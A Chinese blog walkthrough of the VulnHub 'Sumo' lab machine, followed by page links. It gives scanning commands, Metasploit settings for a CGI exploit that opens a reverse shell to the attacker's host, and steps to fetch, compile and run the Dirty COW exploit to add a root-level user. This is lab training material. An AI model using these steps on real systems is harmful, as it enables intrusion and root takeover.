vulnhub靶场渗透sumo漏洞复现(脏牛漏洞)

已于 2023-08-09 21:13:53 修改
阅读量270 收藏 2
点赞数 2
分类专栏: vunlnhub靶场漏洞复现 文章标签: unix ubuntu 网络安全 安全 系统安全
于 2023-08-09 21:11:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61702710/article/details/132197467
版权

  • 机器名称:Sumo_Sun*

  • 难度:初级

  • 测试:VMware Workstation 15.x Pro以上

  • 目标: 获取根外壳,即(root@localhost:~#),然后在 /root 下获取标志)。

  • 下载链接:https://download.vulnhub.com/sumo/Sumo.zip

1.内网渗透

先利用namp扫描整个网段,找出靶机的IP为192.168.179.117

image-20230809155403000

2.端口扫描

扫描所有开放的端口,找出的开放端口为80,22

image-20230809155450054

根据对应的端口,找到可能存在的漏洞,没发现漏洞

 nmap --script=vuln -p80 192.168.179.117

image-20230809155531743

3.扫描指纹

要下载插件扫描指纹信息,用kali自带的whatweb插件,apache版本为2.2.22

image-20230809155642489

4.目录扫描

通过dirb遍历一下其可能存在的站点,发现了三个站点,但是排查完发现没什么用

image-20230809160152237

5.漏洞扫描

nikto 扫描网站漏洞,发现了一个漏洞

 nikto -h http://192.168.179.117

image-20230809155956649

用msf查找一下漏洞,发现有几个模块可以利用

image-20230809160339597

设置参数,利用模块进行攻击,需要设置的参数

 set rhosts 192.168.179.117(目标主机)
 set TARGETURI /cgi-bin/test
 set lhost 192.168.179.131(本机)
 set lport 4444(监听端口)

image-20230809160707154

设置完参数后run进行攻击,如图说明攻击成功,当前账户为www-data,由于没有回显,利用python构造一个回显

 python -c 'import pty; pty.spawn("/bin/bash")'

image-20230809160937185

6.漏洞提权

Ubuntu12.04 可以使用脏牛进行内核提权,searchsploit查找dirtycow漏洞,将漏洞源码40839.c复制到当前的文件夹下

image-20230809163416647

将40839.c重命名dirty.c到html目录下,开启apache2功能,目的是让攻击机能够下载dirty.c

image-20230809163723324

在攻击机上通过wget下载dirty.c,然后给文件提权

image-20230809164236591

使用 GCC 编译器编译名为 "dirty.c" 的源代码文件,并生成可执行文件 "dirty",执行文件dirty,密码设置为123456,用户名为firefart

image-20230809164519856

切换到firefart用户下,密码为123456,然后切换到主目录下,ls发现文件root.txt,cat一下发现flag

image-20230809165441807

7.总结

该漏洞环境主要是复现脏牛漏洞dirty cow,先通过msf查找漏洞后进行利用,再用dirty cow进行提权

网安小陈(小白)
关注
专栏目录
脏牛漏洞-Docker逃逸POC(dirtycow-vdso)代码分析
enjoy5512的博客
11-17 7450
脏牛漏洞Docker逃逸POC函数注释
Vulhub漏洞靶场搭建
javagty6778的博客
03-10 1867
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式。
靶机渗透测试(Sumo_Sun*)
@小张小张的博客
09-19 579
靶机渗透测试(Sumo_Sun*): Vulnhub靶机 Sumo_Sun* 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Beginner) 目标:成功渗透进入靶机,得到root shell ,提升至root权限! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址:192.168.10.22 2. nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶
渗透测试练习记录之sumo1靶机
热门推荐
qq_33163046的博客
06-17 1万+
环境搭建见 https://blog.csdn.net/qq_33163046/article/details/106544200 攻击机: 10.42.43.56(192.168.56.111) 1.用arp-scan搜索确定靶机IP root@kali:~# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:5b:79, IPv4: 192.168.56.111 Starting arp-scan 1....
【OSCP系列】OSCP靶机-Sumo(原创)
Lusen的博客
07-22 730
OSCP系列-Sumo靶场做题记录
[网络安全学习篇78]:Sumo: 1.1 Vulnhub 实战(脏牛漏洞提权)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-28 1348
往期博文: [网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵 [网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵 [网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵 [网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵 [网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵 [网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵 [网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵 [网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵 [网络安全学习篇7
开源漏洞靶场环境-Vulhhub
煮酒闲谈
12-22 8652
0x 前言分享一个开源漏洞靶场环境Vulhhub Vulhub - Some Docker-Compose files for vulnerabilities environmentVulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。0x1 Installation项目地址: https://github.com/Cherishao/
sumo用户手册_sumo用户手册
07-02
SUMO用户手册》是为交通仿真软件SUMO(Simulation of Urban MObility)准备的一份详尽指导文档。SUMO是一款开源、免费且高度可扩展的交通模拟工具,广泛应用于城市交通规划、交通管理策略分析以及智能交通系统的...
SUMO仿真+上海市高架OSM+适合于SUMO初学者
01-11
SUMO(Simulation of Urban MObility)是一款开源的交通模拟软件,它允许用户模拟城市交通系统,包括车辆、行人和公共交通。在这个名为“SUMO仿真+上海市高架OSM+适合于SUMO初学者”的练习中,我们将深入探讨如何...
SUMO交通仿真平台使用笔记
05-19
SUMO(Simulation of Urban MObility)是一个开源的微观交通仿真软件,广泛应用于城市交通规划、交通管理策略研究等领域。本笔记主要介绍SUMO交通仿真平台的使用,包括道路网络的构建、车辆需求的设定以及仿真的执行...
SUMO中的交通需求模型介绍
03-28
在微观交通仿真领域,SUMO(Simulation of Urban MObility)是一个广泛应用的开源软件,它允许用户模拟复杂的交通网络和交通行为。本文将详细介绍SUMO中的交通需求模型及其构建方法,帮助用户更好地理解和运用SUMO...
SUMO.rar_SUMO手册_sumo 交通_sumo交通仿真_sumo仿真官网_交通模型
07-15
SUMO交通仿真模型,SUMO手册,其中介绍了场景的设置等。
linux与unix
m0_74233882的博客
09-11 258
此外unix并不兼容,主流的unix系统有三种AIX,HP-UX,Solaris运行在各自的服务器,但非常稳定,并行度非常高,是PC机无法比拟的。linux既可以进行命令行操作,也可以进行图形化的操作。linux具有很好的跨平台性,可以运行在多种硬件平台。linux是开源的,unix是闭源的。unix大多需要与指定硬件配套使用。linux要求较低,unix要求高。unix只是命令行下的操作。
Ubuntu Juju 与 Ansible的区别
xidianjiapei001的博客
09-11 684
Juju and Ansible are both powerful tools used for managing and orchestrating IT infrastructure and applications, but they have different approaches and use cases.
ubuntu 22.04 ~24.04 如何修改登录背景
最新发布
xdhyqd的专栏
09-14 146
背景:由于22.04 登录gdm的变更,之前的修改登录背景的方案已经无法使用。另外,说一句,当你哪天用了ubuntu之后,你会发现,win真的是个渣渣~~~推荐大家体验哈。说明:111.jepg可以更换为任何你想设置的图片。
Ubuntu Juju介绍
xidianjiapei001的博客
09-11 807
Ubuntu Juju is an open-source, application and service orchestration tool developed by Canonical (the company behind Ubuntu). It is designed to simplify the deployment, management, and scaling of cloud services, applications
Ubuntu搭建FTP服务器
weixin_42198851的博客
09-10 523
5. 执行以下指令打开/etc/xinetd.d/tftp 文件, 配置/etc/ xinetd.d/tftp 文件,将 tftp 路径设置为tftp服务目录。2. 新建tftp工作目录,并添加读、写、执行权限(没有权限后面无法正常访问该文件夹),如下图所示。3. 安装 tftp-hpa 和 tftpd-hpa 服务程序,其命令如下图所示。
ubuntu20.04 编译vtk 9.3.1+vtkDicom+GDCM 3.0.24
genispan的专栏
09-12 371
cmake-gui如下图所示,选择源码目录和build目录:勾选 BUILD_SHARED_LIBS以及VTK_DEBUG_LEAKS。作者喜欢用vtkDicom库,添加了对vtkDicom的使用,所以启用了vtkDicom编译条件VTK_MODULE_ENABLE_VTK_vtkDICOM,添加方式如下:执行configure,在完成后的界面勾选使用gdcm。再次执行configure,提示错误,需要输入GDCM的路径。所以我们进入下一个环节,编译GDCM。
SUMO交通模拟初学者指南
"本文是关于SUMO软件的快速上手指南,主要介绍如何构建网络、车辆和交通模型。文中提供了一个包含四个源点、四个目标点以及两个无信号控制的十字路口的示例网络,每个方向有三条车道,并规定了车辆不能换道和做U型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值